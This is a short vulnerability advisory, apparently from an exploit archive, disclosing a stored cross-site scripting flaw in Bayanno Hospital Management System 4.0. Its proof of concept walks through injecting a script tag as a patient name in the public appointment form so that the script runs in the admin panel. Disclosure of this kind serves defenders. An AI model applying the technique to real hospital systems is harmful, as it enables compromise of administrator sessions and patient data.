Bayanno Hospital Management System 4.0 Cross Site Scripting

Bayanno Hospital Management System version 4.0 suffers from a cross site scripting vulnerability.

MD5 | 0b9dd1970fe20aed3bd38b43e3821098

# Exploit Title: Bayanno Hospital Management System 4.0 - Cross-Site Scripting
# Date: 2018-09-05
# Software Link:
# Exploit Author: Gokhan Sagoglu
# Vendor Homepage::
# Version: v4.0
# Live Demo:
# Category: webapps

# 1. Description
# Due to improper user input management and lack of output encoding, unauthenticated users are able
# to inject malicious code via making an appointment. Malicious code runs on admin panel.

# 2. PoC

- To make an appointment go to: /bayanno/index.php?home/appointment
- Select aNew Patienta.
- Type <script>alert(1)</script> as name.
- Fill the other fields with proper values.
- Click on aBook Nowa button.
- Go to admin panel and login as admin: /bayanno/index.php?login
- To view patients go to: /bayanno/index.php?admin/patient
- Malicious script will run.

Related Posts